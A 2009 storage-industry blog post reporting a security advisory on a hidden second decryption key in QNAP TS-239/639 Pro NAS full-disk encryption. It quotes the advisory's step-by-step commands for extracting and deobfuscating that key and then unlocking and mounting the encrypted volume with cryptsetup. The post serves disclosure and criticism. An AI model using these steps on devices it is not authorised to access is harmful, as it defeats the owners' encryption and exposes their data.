«  
Home
  »

QNAP blunders with hard disk encryption

According to Baseline Security, QNAP has been shipping their new series of storage applianced supporting full-disk encryption with a hidden backdoor (or decryption feature, depending on your point of view). The devices use the Linux Unified Key Setup software for the encryption; the entire disk is encrypted, and on reboot a decryption key has to be entered before data can be accessed.

While this is a solid architecture, built on top of some well-known software, there is a small hole in the encryption. When you create the encryption key, the devices add a second key that can decrypt all data. The key is stored with minimal encryption obfuscation; the only thing the software does is reverse 6 characters and changing the order of those characters. To summarize the most important points of the security advisory:

An attacker – or user who has lost his passphrase – just needs
to do the following:

1. Obtain the backdoor key from the flash:
# strings /dev/sdx6 | grep ENCK
ENCK=ghijklmnopqrstuvwxyz012345fedcba
It is possible that several ENCK keys show up.

2. The key has then to be deobfuscated. The last 6 characters have
to be taken, reversed, and put in front of the string:

ENCK key before: ghijklmnopqrstuvwxyz012345fedcba
ENCK key after: abcdefghijklmnopqrstuvwxyz012345

3. The key file has to be created:
# echo -n “abcdefghijklmnopqrstuvwxyz012345″ > /tmp/key

4. The encrypted volume is unlocked and mounted. The device is
usually /dev/md0 or /dev/sda3.
# /sbin/cryptsetup luksOpen /dev/md0 md0 –key-file=/tmp/key
key slot 0 unlocked.
Command successful.
# mount /dev/mapper/md0 /share/MD0_DATA
Full access to the encrypted volume has been obtained.

QNAP has promised to release an updated firmware that fixes this; I hope they don’t make these kinds of backdoors standard on all their products! If they do, they need to be more upfront about this and label it a “recovery feature” or something like that; I’m sure this will benefit some users, but it does seem to negate any advantages of the encryption feature.

QNAP TS-639 Pro

QNAP TS-639 Pro

Baseline Security has verified that the issue is present on the TS-239 Pro and TS-639 Pro, but there might be other models affected as well.

Related posts:

  1. Full-disk SATA encryption from Addonics
  2. Cisco teams up with QNAP to provide low-end storage hardware
  3. Qnap launches updated 4-drive rackmount NAS
  4. IronKey responds to secure flash drive vulnerabilities
  5. Verizon Business adds cloud storage

September 18th, 2009 | Tags: , | Category: Networked storage, Other

1 comment to QNAP blunders with hard disk encryption

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>